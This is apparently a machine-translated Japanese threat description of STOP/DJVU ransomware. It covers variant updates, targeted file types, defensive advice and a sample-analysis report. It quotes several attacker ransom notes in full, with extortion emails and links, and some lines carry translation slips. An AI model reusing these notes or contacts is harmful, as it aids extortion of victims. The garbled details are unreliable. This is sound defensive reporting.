ランサムウェアを停止

PC セキュリティ研究者は、2018 年 2 月 21 日に STOP ランサムウェアとして知られる脅威を含むランサムウェア攻撃の報告を受けました。 STOP ランサムウェアは、オープン ソースのランサムウェア プラットフォームに基づいており、暗号化ランサムウェア攻撃の典型的なバージョンを実行します。 STOP ランサムウェアは、破損した添付ファイルを含むスパム メール メッセージを使用して配布されます。これらの添付ファイルは、マクロ スクリプトが埋め込まれた DOCX ファイルの形式で、STOP ランサムウェアをダウンロードして被害者のコンピュータにインストールします。フィッシング メールを認識する方法を学び、受信した未承諾の添付ファイルをダウンロードしないようにすることは、これらの攻撃を回避する方法の 1 つです。

STOP ランサムウェア感染を認識する方法

STOP ランサムウェアが被害者のコンピューターにインストールされると、STOP ランサムウェアは被害者のドライブでさまざまな種類のファイルを検索します。 STOP ランサムウェアは、Web サーバーを標的にするように設計されているようです。これは、通常、これらのマシンに明示的に含まれているデータベース ファイルや類似のファイル タイプを検索するためです。 STOP ランサムウェアが検索し、攻撃の対象とするファイルの種類は次のとおりです。

.3dm、.3g2、.3gp、.7zip、.aaf、.accdb、.aep、.aepx、.aet、.ai、.aif、.as、.as3、.asf、.asp、.asx、.avi 、.bmp、.c、.class、.cpp、.cs、.csv、.dat、.db、.dbf、.doc、.docb、.docm、.docx、.dot、.dotm、.dotx、. dwg、.dxf、.efx、.eps、.fla、.flv、.gif、.h、.idml、.iff、.indb、.indd、.indl、.indt、.inx、.jar、.java、 .jpeg、.jpg、.js、.m3u、.m3u8、.m4u、.max、.mdb、.mid、.mkv、.mov、.mp3、.mp4、.mpa、.mpeg、.mpg、.msg 、.pdb、.pdf、.php、.plb、.pmd、.png、.pot、.potm、.potx、.ppam、.ppj、.pps、.ppsm、.ppsx、.ppt、.pptm、. pptx、.prel、.prproj、.ps、.psd、.py、.ra、.rar、.raw、.rb、.rtf、.sdf、.sdf、.ses、.sldm、.sldx、.sql、 .svg、.swf、.tif、.txt、.vcf、.vob、.wav、.wma、.wmv、.wpd、.wps、.xla、.xlam、.xll、.xlm、.xls、.xlsb 、.xlsm、.xlsx、.xlt、.xltm、.xltx、.xlw、.xml、.xqx、.xqx、.zip。

今週のマルウェア Ep 10: STOP & Zorab Ransomware が偽の復号化機能を使って被害者を悪用

STOP ランサムウェアは、強力な暗号化アルゴリズムを使用して、被害者の各ファイルにアクセスできないようにします。 STOP ランサムウェア攻撃は、影響を受けるファイルをマークする方法として、暗号化するファイルにファイル拡張子「.SUSPENDED」を追加します。

STOP ランサムウェアの身代金メモ

STOP ランサムウェアは、被害者のコンピュータに身代金メモを送信することにより、身代金の支払いを要求します。この身代金メモは、被害者のデスクトップにドロップされたテキスト ファイルに表示されます。 「!!!」という名前のファイルYourDataRestore !!!.txt,' には次のメッセージが含まれています。

「あなたの重要なファイルはすべてこの PC 上で暗号化されています。
.STOP 拡張子を持つすべてのファイルは暗号化されます。暗号化は、このコンピューター用に生成された一意の秘密キー RSA-1024 を使用して生成されました。
ファイルを復号化するには、秘密鍵 + 復号化ソフトウェアを入手する必要があります。
秘密鍵を取得してソフトウェアを復号化するには、stopfilesrestore@bitmessage.ch に電子メールで連絡して、!!!YourDataRestore!!!.txt ファイルを電子メールで送信し、指示を待つ必要があります。
あなたのファイルを復号化できることを確認してください。1 ～ 3 個の暗号化されたファイルを送信してください。元の形式で無料で送信してください。
最初の 72 時間にご連絡いただいた場合、復号化の価格は $600 です。
あなたの個人ID:
【ランダム文字】
お問い合わせ先メールアドレス：
stopfilesrestoret@bitmessage.ch
お問い合わせ先のメールアドレスを予約してください:
stopfilesrestore@india.com'

STOP ランサムウェアの責任者は、72 時間以内に、ビットコインを使用して特定のビットコイン ウォレット アドレスに 600 米ドルの身代金を支払うことを要求します。ただし、これらの人々に連絡したり、STOP Ransomware の身代金を支払うことは、最善の解決策ではない可能性があります。

STOP ランサムウェアやその他のランサムウェア型トロイの木馬からデータを保護する

STOP ランサムウェアやその他のランサムウェア型トロイの木馬に対する最善の保護は、ファイルのバックアップを取ることです。ファイルのバックアップ コピーを持っているコンピューター ユーザーは、身代金を支払うことなく、攻撃後にこれらのファイルを簡単に回復できます。推奨されるセキュリティ プログラムは、STOP Ransomware が最初からインストールされるのを防ぐこともできます。

2018 年 12 月 6 日更新 — 「helpshadow@india.com」ランサムウェア

「helpshadow@india.com」ランサムウェアは、STOP ランサムウェア ブランドを運ぶコードへの比較的小さなアップデートとして分類されます。脅威の作成者は、新しい亜種の感染率が低かったため、この新しい亜種を洗練するために十分な時間を費やしていないようです。 「helpshadow@india.com」ランサムウェアは AV ベンダーによってすぐに取り上げられ、主要なソーシャル プラットフォームやサイバーセキュリティ レポートを通じてアラートが発行されました。残念ながら、無料の復号化の可能性はまだありません。ユーザーは通常、電子メールで受信した破損したドキュメントを通じて侵害されます。この脅威は、Windows によって作成されたシャドウ ボリュームのスナップショットを消去し、暗号化されたオブジェクトに「.shadow」拡張子を付けることが知られています。たとえば、「C12-H22-O11.pptx」は「C12-H22-O11.pptx.shadow」に名前が変更され、「!readme.txt」という身代金メモがデスクトップに表示されます。 「helpshadow@india.com」ランサムウェアは、感染したユーザーに次のメッセージを表示する可能性があります。

'あなたのファイルはすべて暗号化されています
心配しないで、すべてのファイルを返すことができます。
すべてのファイル、ドキュメント、写真、データベース、その他の重要なファイルは、最も強力な暗号化と一意のキーで暗号化されます。
ファイルを回復する唯一の方法は、復号化ツールと一意のキーを購入することです。
このソフトウェアは、暗号化されたすべてのファイルを復号化します。
私たちはあなたにどのような保証を提供しますか?
暗号化されたファイルの 1 つを PC から送信すると、無料で復号化できます。
ただし、無料で復号化できるファイルは 1 つだけです。ファイルには貴重な情報が含まれていてはいけません
ファイルを破壊するため、サードパーティの復号化ツールを使用しないでください。
最初の 72 時間にご連絡いただくと、50% の割引をご利用いただけます。
このソフトウェアを入手するには、電子メールに次のように記入する必要があります。
helpshadow@india.com
連絡用のメールアドレスを予約してください:
helpshadow@firemail.cc
あなたの個人ID:
[ランダムな文字]'

上記のテキストは、「helpshadow@india.com」ランサムウェアよりも前にリリースされた亜種によって使用されており、注目に値する唯一の変更点は、新しいメール設定です。 「helpshadow@india.com」ランサムウェアは、メール連絡先の 1 つにちなんで名付けられており、もう 1 つは、ユーザーを同じユーザー名であるが異なるメール プラットフォームである「helpshadow@firemail.cc」を参照しています。この記事が届くまでに、両方のメール アカウントが停止される可能性があります。 helpshadow@india.com のランサムウェアの背後にいる人物を捕まえる可能性は、ランサムウェアのオペレーターがプロキシ、VPN サービス、および TOR ネットワークを使用して制御デバイスを隠していることを考えると、大きくはありません。したがって、ユーザーはデータを積極的に保護する必要があります。ステップ 1 — システムにバックアップ プログラムをインストールします。ステップ 2 — 不明な送信者からのファイルを開かないでください。データ バックアップをリムーバブル メモリ ストレージまたはファイル ホスティング サービスにエクスポートすることを忘れないでください。

2018 年 12 月 13 日更新 — 「.djvu ファイル拡張子」ランサムウェア

「.djvu ファイル拡張子」ランサムウェアは、2018 年 12 月 12 日に報告された STOP ランサムウェアの新しい亜種です。脅威が依然として主にスパムメールを介して配布されていることを警告します。攻撃者は、マクロが有効なドキュメントと偽の PDF を使用して、ユーザーを騙してプログラムをサイレント インストールさせています。 「.djvu ファイル拡張子」ランサムウェアによる攻撃は、2018 年 2 月の最初の感染の波とほぼ同じです。この脅威は、ユーザーのデータを暗号化する前に、メモリ ドライブに接続されているシャドウ ボリュームのスナップショットとマップを削除します。新しい亜種は別のファイル拡張子をサポートし、身代金メモはわずかに変更されています。名前が示すように、ファイルには「.djvu」という接尾辞が付けられ、「Jonne-Kaiho.mp3」のような名前は「Jonne-Kaiho.mp3.djvu」に変更されます。身代金メモはデスクトップに「_openme.txt」として表示され、次のように表示されます。

'あなたのファイルはすべて暗号化されています
心配しないで、すべてのファイルを返すことができます。
すべてのファイル、ドキュメント、写真、データベース、その他の重要なファイルは、最も強力な暗号化と一意のキーで暗号化されます。
ファイルを回復する唯一の方法は、復号化ツールと一意のキーを購入することです。
このソフトウェアは、暗号化されたすべてのファイルを復号化します。
私たちはあなたにどのような保証を提供しますか?
暗号化されたファイルの 1 つを PC から送信すると、無料で復号化できます。
ただし、無料で復号化できるファイルは 1 つだけです。ファイルには貴重な情報が含まれていてはいけません
ファイルを破壊するため、サードパーティの復号化ツールを使用しないでください。
最初の 72 時間にご連絡いただくと、50% の割引をご利用いただけます。
このソフトウェアを入手するには、電子メールに次のように記入する必要があります。
helpshadow@india.com

お問い合わせ先のメールアドレスを予約してください:
helpshadow@firemail.cc

あなたの個人ID:
[ランダムな文字]'

脅威の作成者は、ランサムウェア キャンペーンで引き続き「helpshadow@india.com」および「helpshadow@firemail.cc」のメール アカウントを使用します。 STOP Ransomware チームを信頼せず、上記の偽の 50% 割引の使用を避けてください。ここで説明する脅威アクターは、寛容であることは知られていません。 PC ユーザーは、信頼できるマルウェア対策ツールを使用して、「.djvu ファイル拡張子」ランサムウェアを削除する必要があります。データを回復するには、バックアップ イメージとバックアップ サービスを使用することをお勧めします。

2019 年 1 月 11 日更新 — 「.tfude File Extension」ランサムウェア

「.tfude File Extension」ランサムウェアは、2019 年 1 月 11 日に出現した STOP ランサムウェアのバージョンです。この脅威は、元のサイバー脅威と比較して最小限の変更を示すバージョンとして分類されています。 「.tfude File Extension」ランサムウェアは、破損したコードの唯一の注目すべき変更にちなんで名付けられました。このトロイの木馬は、暗号化されたデータに「.tfude」ファイル拡張子を付けるように構成されています。 「.tfude ファイル拡張子」ランサムウェアは、引き続き標準の暗号化技術と Command サーバーへの安全な接続を使用して、セキュリティ専門家が侵害されたユーザーに無料の復号化を提供することを防ぎます。

暗号通貨の脅威は、政府機関や Google Inc. などの企業がデータ転送を保護するために採用している暗号化技術を使用しています。暗号化されたファイルは Windows エクスプローラーに一般的な白いアイコンとして表示され、ユーザーがインストールしたプログラムは引き続き機能します。ただし、この脅威は一般的なデータベース形式をエンコードするため、特定のデータベース マネージャーは正しく動作しない可能性があります。たとえば、「Recent sales.pdb」は「Recent sales.pdb.tfude」に名前が変更されます。身代金メモは、デスクトップにある「_openme.txt」ファイルからメモ帳に読み込まれます。 「.tfude File Extension」ランサムウェアは、元のトロイの木馬と同じメッセージを表示しますが、今回は、攻撃者は「pdfhelp@firemail.cc」メール アカウントを使用してユーザーに連絡しています。ユーザーが利用できる無料の復号化プログラムはなく、データ バックアップを使用して回復する必要があります。評判の良いマルウェア対策ツールで完全なシステム スキャンを実行して、感染したデバイスをクリーンアップする必要があります。

2019 年 1 月 23 日更新 — 「pausa@bitmessage.ch」ランサムウェア

「pausa@bitmessage.ch」ランサムウェアは、STOP Ransomware Builder で生成されるファイル エンコーダー マルウェアです。 「pausa@bitmessage.ch」ランサムウェアは、2018 年 5 月の第 1 週にスパム メールを介して PC ユーザーにリリースされました。回復を妨げるスナップショット。 「pausa@bitmessage.ch」ランサムウェアは、Cerber や Dharma などの他の成功したランサムウェアと同じ暗号化技術を使用することが知られています。 「pausa@bitmessage.ch」ランサムウェアは、AppData ディレクトリの下の Temp フォルダから実行され、安全な AES-256 暗号をドキュメント、ビデオ、音楽、データベース、および電子ブックに適用するようにプログラムされています。エンコードされたデータは「.PAUSA」拡張子を受け取り、「Hartmann-Save me.mp3」のような名前は「Hartmann-Save me.mp3.pausa」に名前が変更されます。身代金の通知は、「!!RESTORE!!!.txt」としてユーザーのデスクトップに保存され、次のように読み取られます。

「あなたの重要なファイルはすべてこの PC 上で暗号化されています。
.PAUSA 拡張子を持つすべてのファイルは暗号化されます。
暗号化は、このコンピューター用に生成された一意の秘密キー RSA-1024 を使用して生成されました。
ファイルを復号化するには、秘密鍵 + 復号化ソフトウェアを入手する必要があります。
秘密鍵を取得してソフトウェアを復号化するには、pausa@bitmessage.ch に電子メールで連絡して、!!!RESTORE!!!.txt ファイルを電子メールで送信し、さらなる指示を待つ必要があります。
私たちがあなたのファイルを復号化できることを確認しておくために、あまり大きくない暗号化されたファイルを 1 ～ 3 個送っていただければ、元の形式で無料で返送いたします。
最初の 72 時間にご連絡いただいた場合、復号化の価格は $600 です。
あなたの個人ID:
【ランダムキャラ】
お問い合わせ先メールアドレス：
pausa@bitmessage.ch
連絡用のメールアドレスを予約してください:
pausa@india.com'

「pausa@bitmessage.ch」および「pausa@india.com」のメール アカウントを介した攻撃者との交渉は避けることをお勧めします。信頼できるマルウェア対策ツールを使用して、データ バックアップを起動し、システムをクリーンアップする方が安全です。 600 ドルというばかげた身代金を払ったとしても、復号化プログラムを受け取る保証はありません。 PC ユーザーは、少なくとも月に 2 回データのバックアップを作成し、セキュリティの侵害につながる可能性のあるスパム メッセージを無視することをお勧めします。 AV 企業は、「pausa@bitmessage.ch」ランサムウェアの検出ルールをサポートしていますが、この記事の執筆時点では、無料の復号化プログラムを利用できません。

2019 年 1 月 23 日更新 — 「waiting@bitmessage.ch」ランサムウェア

「waiting@bitmessage.ch」ランサムウェアは、STOP ランサムウェアに基づく暗号化トロイの木馬です。 「waiting@bitmessage.ch」ランサムウェアは、2018 年 4 月 18 日に侵害されたユーザーによって報告され、破損した Microsoft Word ドキュメントを介してコンピューターに侵入しているようです。 「waiting@bitmessage.ch」ランサムウェアは、感染したコンピュータ上の写真、オーディオ、ビデオ、およびテキストを暗号化するために記録されます。残念ながら、マルウェアの作成者は、データを保護するために Windows が作成するボリューム スナップショットを削除するコマンドを追加しました。このトロイの木馬は、「.WAITING」拡張子を持つファイルで標的のデータを上書きし、システム上のソフトウェアで開くことができません。たとえば、「Hartmann-Like a River.mp3」は「Hartmann-Like a River.mp3.waiting」に名前が変更され、身代金メッセージがデスクトップにドロップされます。 「waiting@bitmessage.ch」ランサムウェアは「!!!INFO_RESTORE!!!.txt」をデスクトップに書き込み、次のテキストを表示します。

「あなたの重要なファイルはすべてこの PC 上で暗号化されています。
.WAITING 拡張子を持つすべてのファイルは暗号化されます。
暗号化は、このコンピューター用に生成された一意の秘密キー RSA-1024 を使用して生成されました。
ファイルを復号化するには、秘密鍵 + 復号化ソフトウェアを入手する必要があります。
秘密鍵を取得してソフトウェアを復号化するには、waiting@bitmessage.ch まで電子メールでご連絡ください。!!!INFO_RESTORE!!!.txt ファイルを電子メールで送信し、指示を待ちます。
私たちがあなたのファイルを復号化できることを確認しておくために、あまり大きくない暗号化されたファイルを 1 ～ 3 個送っていただければ、元の形式で無料で返送いたします。
最初の 72 時間にご連絡いただいた場合、復号化の価格は $600 です。
あなたの個人ID:
【ランダムキャラ】
お問い合わせ先メールアドレス：
待機@bitmessage.ch
お問い合わせ先のメールアドレスを予約してください:
Waiting@india.com'

マルウェアはサードパーティのバックアップ ツールに干渉しないため、データ バックアップを起動できるはずです。 「waiting@bitmessage.ch」および「waiting@india.com」の電子メール アドレスを介した攻撃者とのやり取りを避けることが推奨されます。ネットワークから送信されるサイバー脅威や、「waiting@bitmessage.ch」ランサムウェアなどのほとんどのランサムウェアの亜種からデータ バックアップを保護したい場合は、ファイル ホスティング サービスを検討することをお勧めします。

更新11月25日^目、2019 - .zobmと.rote拡張機能

セキュリティ研究者は、2019 年 11 月 24 日と 25 日に STOP ランサムウェアの新しい亜種をいくつか発見しました。 ランサムウェアの亜種は、暗号化されたファイルに .zobm および .rote 拡張子を付加しましたが、_readme.txt という名前の同一の身代金メモがありました。脅威アクターに到達する可能性のある電子メールも同じでした - datarestorehelp@firemail.cc と datahelp@iran.ir。

注意！
心配しないで、すべてのファイルを返すことができます。
写真、データベース、ドキュメント、その他の重要なファイルはすべて、最も強力な暗号化と一意のキーで暗号化されます。
ファイルを回復する唯一の方法は、復号化ツールと一意のキーを購入することです。
このソフトウェアは、暗号化されたすべてのファイルを復号化します。
あなたが持っている保証は何ですか？
暗号化されたファイルの 1 つを PC から送信すると、無料で復号化できます。
ただし、無料で復号化できるファイルは 1 つだけです。ファイルには貴重な情報が含まれていてはなりません。
ビデオ概要復号化ツールを入手して見ることができます。
https://we.tl/t-4NWUGZxdHc
秘密鍵と復号化ソフトウェアの価格は 980 ドルです。
最初の 72 時間にご連絡いただければ、50% の割引をご利用いただけます。価格は $490 です。
支払いを行わないと、データを復元することはできませんのでご注意ください。
6 時間以上応答がない場合は、電子メールの「スパム」または「ジャンク」フォルダーを確認してください。

このソフトウェアを入手するには、電子メールに次のように記入する必要があります。
datarestorehelp@firemail.cc
連絡用のメールアドレスを予約してください:
datahelp@iran.ir
あなたの個人ID:
【ランダムキャラ】

2019 年以降のランサムウェアの阻止

2019 年の後半には、STOP ランサムウェアが引き続き使用され、新しい攻撃ベクトルがテストされていました。 STOP ランサムウェアは、他の形式のマルウェア (主にアドウェア) を含むバンドルとして出現し始めました。これらのマルウェアは、ゲームやソフトウェアのクラックされた実行可能ファイルをホストしていると主張する Web サイトで見つけることができます。このようにして、ランサムウェアの新しい犠牲者の多くは、希望に満ちたソフトウェアの海賊であることが判明しました。

STOP ランサムウェアが、さまざまなログイン資格情報を収集できるパスワードを盗むトロイの木馬をインストールしているという証拠もあります。

また、ランサムウェアは、使用する暗号化されたファイル拡張子の長いリストを拡張しました。 STOP ランサムウェアによって暗号化されたファイルは、.rumba および .tro 拡張子を受け取りました。これまでのところ、他にほとんど変更はありません - 身代金メモはまだ「_openme.txt」という名前のファイルで見つかりましたが、身代金の合計は 980 ドルに跳ね上がり、被害者が感染後最初の 72 時間以内に支払いを行った場合、490 ドルに減少しました。 .

2020 年 3 月 24 日更新 – 新しいバリアント

STOP ランサムウェアの背後にいる攻撃者は、2019 年と同様、2020 年も精力的に活動しており、新しい亜種が被害者のファイルを暗号化し、さまざまな新しい拡張子を付加します。 STOP ランサムウェアの新しい拡張子には、.piny、.redl、.rooe、mmnn、.ooss、.rezm、.lokd、.foop などがあります。

.lokd 亜種に付属する身代金メモのサンプルには、次のテキストが含まれていました。

注意！

心配しないで、すべてのファイルを返すことができます。
写真、データベース、ドキュメント、その他の重要なすべてのファイルは、最も強力な暗号化と一意のキーで暗号化されます。
ファイルを回復する唯一の方法は、復号化ツールと一意のキーを購入することです。
このソフトウェアは、暗号化されたすべてのファイルを復号化します。
あなたが持っている保証は何ですか？
暗号化されたファイルの 1 つを PC から送信すると、無料で復号化できます。
ただし、無料で復号化できるファイルは 1 つだけです。ファイルには貴重な情報が含まれていてはなりません。
ビデオ概要復号化ツールを入手して見ることができます。
https://we.tl/t7m8Wr997Sf
秘密鍵と復号化ソフトウェアの価格は 980 ドルです。
最初の 72 時間にご連絡いただければ、50% の割引をご利用いただけます。価格は $490 です。
支払いを行わないと、データを復元することはできませんのでご注意ください。
6 時間以上応答がない場合は、電子メールの「スパム」または「ジャンク」フォルダーを確認してください。

このソフトウェアを入手するには、電子メールに次のように記入する必要があります。
helpdatarestore@firemail.cc
連絡用のメールアドレスを予約してください:
helpmanager@mail.ch
あなたの個人ID:
【ランダムキャラ】

攻撃者がこれらの新しい亜種とともに使用している他の電子メールには、helpmanager@iran.ir と helpmanager@firemail.cc があります。

SpyHunterはランサムウェアを停止を検出して削除します

ランサムウェアを停止スクリーンショット

分析レポート

一般情報

Family Name:	STOP/DJVU Ransomware
Signature status:	No Signature

Known Samples

i

Known Samples

This section lists other file samples believed to be associated with this family.

MD5: def8a7bfe5fe47d95a95085d8dbc7a53 SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6 SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192 ファイルサイズ: 6.29 MB, 6292105 bytes

MD5: a6b8c0cb178c31dd347554c3e5a0d5f8 SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C ファイルサイズ: 3.47 MB, 3471869 bytes

MD5: 2336c9624d9a44c393d354206226f508 SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190 SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0 ファイルサイズ: 1.36 MB, 1359918 bytes

MD5: 42f32aa699bc45a3638ddeb325ebebc1 SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8 SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4 ファイルサイズ: 1.33 MB, 1328186 bytes

MD5: 2391d41548b6432191f73edefa273928 SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959 ファイルサイズ: 3.36 MB, 3357556 bytes

Show More

MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4 SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5 SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB ファイルサイズ: 1.36 MB, 1364106 bytes

MD5: 601b120a6f39f72847b2f581a3d5f158 SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732 SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818 ファイルサイズ: 4.86 MB, 4858569 bytes

MD5: a7b76a49f289081961f8f3824f0b62ca SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45 ファイルサイズ: 1.41 MB, 1406899 bytes

MD5: 9f37930d62a1e08f68aa0a72472e7a55 SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153 SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F ファイルサイズ: 600.12 KB, 600124 bytes

MD5: 7a18839fe61e9cde0e8fea3100acfb2b SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837 SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF ファイルサイズ: 316.83 KB, 316832 bytes

MD5: fe17d0f940a226e80cc18b4399da4ffc SHA1: cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b SHA256: D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713 ファイルサイズ: 1.36 MB, 1363661 bytes

Windows Portable Executable Attributes

i

Windows Portable Executable Attributes

This section lists file attributes found within family samples. These attributes are extracted from the files’ Windows PE (Portable Executable) specification and various system flags. Portable Executable Attributes give malware researchers insight into a file’s functionality, executable details, platform and runtime environment.

• File doesn't have "Rich" header
• File doesn't have debug information
• File doesn't have exports table
• File doesn't have relocations information
• File doesn't have security information
• File has exports table
• File has TLS information
• File is 32-bit executable
• File is 64-bit executable
• File is either console or GUI application

Show More

• File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
• File is Native application (NOT .NET application)
• File is not packed
• IMAGE_FILE_DLL is not set inside PE header (Executable)
• IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

i

File Icons

This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.

Windows PE Version Information

i

Windows PE Version Information

This section displays values and attributes that have been set in the Windows file version information data structure for samples within this family. To mislead users, malware actors often add fake version information mimicking legitimate software.

ネーム	価値
Assembly Version	1.4.1.0
Comments	This installation was built with Inno Setup.
Company Name	Alexander Roshal TrayToolbar WinTools Software Engineering, Ltd.
File Description	Archiwizer WinRAR Gestione archivi WinRAR RAM Saver Professional TrayToolbar WinRAR 5.60 64 Bit Setup WinRAR Installer
File Version	26.3.1 26.2.1 26.0.1 25.7.1 25.4.1 6.20.2 6.2.0 1.4.1.0 1.3.0.0 1.00
Internal Name	TJprojMain TrayToolbar.dll WinRAR
Legal Copyright	Copyright © Alexander Roshal 1993-2021 Copyright © Alexander Roshal 1993-2022 Copyright © Alexander Roshal 1993-2025 © Brontech, LLC
Original Filename	TJprojMain.exe TrayToolbar.dll WinRAR.exe
Product Name	Project1 RAM Saver 25.4.1 Professional RAM Saver 25.7.1 Professional RAM Saver 26.0.1 Professional RAM Saver 26.2.1 Professional RAM Saver 26.3.1 Professional TrayToolbar WinRAR WinRAR 5.60 64 Bit WinRAR Installer
Product Version	26.3.1 26.2.1 26.0.1 25.7.1 25.4.1 6.20.2 6.2.0 5.60 1.4.1+80dec33e25323db7125ddec35b475aa881292801 1.4.0 Show More 1.00

Digital Signatures

i

Digital Signatures

This section lists digital signatures that are attached to samples within this family. When analyzing and verifying digital signatures, it is important to confirm that the signature’s root authority is a well-known and trustworthy entity and that the status of the signature is good. Malware is often signed with non-trustworthy “Self Signed” digital signatures (which can be easily created by a malware author with no verification). Malware may also be signed by legitimate signatures that have an invalid status, and by signatures from questionable root authorities with fake or misleading “Signer” names.

Signer	Root	Status
win.rar GmbH	DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1	Self Signed
win.rar GmbH	GlobalSign CodeSigning CA - SHA256 - G3	Hash Mismatch

File Traits

• .NET
• 2+ executable sections
• big overlay
• HighEntropy
• Inno
• InnoSetup Installer
• Installer Manifest
• Installer Version
• MZ (In Overlay)
• No Version Info

Show More

• Nullsoft Installer
• RAR (In Overlay)
• RARinO
• Run
• SusSec
• vb6
• WinRAR SFX
• WRARSFX
• x64
• x86

Files Modified

i

Files Modified

This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.

File	Attributes
\device\namedpipe	Generic Read,Write Attributes
\device\namedpipe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data

Show More

c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll	Generic Write,Read Attributes

Registry Modifications

i

Registry Modifications

This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.

Key::Value	データ	API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	졷鑂셱ǜ	RegNtPreCreateKey

Windows API Usage

i

Windows API Usage

This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.

Category	API
Other Suspicious	SetWindowsHookEx
Anti Debug	IsDebuggerPresent OutputDebugString
User Data Access	GetUserDefaultLocaleName GetUserObjectInformation
Process Manipulation Evasion	NtUnmapViewOfSection ZwMapViewOfSection
Process Shell Execute	CreateProcess
Keyboard Access	GetKeyState
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtApphelpCacheControl ntdll.dll!NtClearEvent ntdll.dll!NtClose Show More ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateMutant ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryFullAttributesFile 